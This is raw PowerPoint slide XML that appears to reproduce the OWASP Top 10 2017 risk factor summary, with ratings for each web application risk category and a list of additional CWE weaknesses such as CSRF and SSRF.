                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Note</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ru-RU" sz="950" u="none"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50" u="sng" baseline="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ru-RU" sz="950" u="sng" baseline="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ru-RU" sz="950" u="none"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ru-RU" sz="950" b="1" baseline="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A6:2017-Security Misconfiguration</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290321481"/>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ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="10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ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EASY: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1">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ru-RU" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" baseline="0">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EASY: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>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ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="10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ru-RU" sz="2400" b="1" baseline="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ru-RU" sz="1800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="1800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Average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1800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>= </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="2400" b="1" baseline="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5" y="8160785"/>
            <a:ext cx="1028819" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= 6.0</a:t>
            </a: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+R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Note About Risks</a:t>
            </a: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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10 Risk Factor Summary</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5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ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> statistics and the experience of the OWASP Top 10 team</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="sng" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>you must consider your own specific threat agents and business impacts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin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5598859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ru-RU" sz="1600" b="1">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ru-RU" sz="950" b="1">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ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">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EASY: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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON: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EASY: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SEVERE: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ru-RU" sz="950" b="1">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ru-RU" sz="900" b="1">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EASY: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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON: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SEVERE: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95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ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sens.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Data Exposure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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="105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SEVERE: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95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ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017-XML Exter-nal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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON: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EASY: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SEVERE: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95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ru-RU" sz="900" b="1">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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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COMMON: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="12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SEVERE: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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>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ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017-Security Misconfiguration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EASY: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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="105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EASY: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MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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950" b="1">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ru-RU" sz="900" b="1">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EASY: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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="105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EASY: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MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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950" b="1">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ru-RU" sz="900" b="1">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DIFFICULT</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900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON: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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SEVERE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017-Vulnerable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Components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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="105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MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</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AVERAGE</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9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WIDESPREAD: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="105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DIFFICULT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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950" b="1">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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Additional Risks to Consider</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ru-RU" sz="950" baseline="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ru-RU" sz="1000" baseline="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50" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CWE-352: Cross-Site Request Forgery (CSRF)</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50" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', 'AppDoS')</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50" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>CWE-434: Unrestricted Upload of File with Dangerous Type</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50" baseline="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50" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>CWE-601: Unvalidated Forward and Redirects</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50" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CWE-799: Improper Control of Interaction Frequency (Anti-Automation)</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50" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)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50" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>CWE-918: Server-Side Request Forgery (SSRF)</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ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prevalence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897232" y="2627763"/>
            <a:ext cx="903369" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Detectability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759009" y="2627763"/>
            <a:ext cx="956796" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952356" y="2627763"/>
            <a:ext cx="869908" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Technical</a:t>
            </a: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ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU" sz="900" b="1">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ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Business</a:t>
            </a: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+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
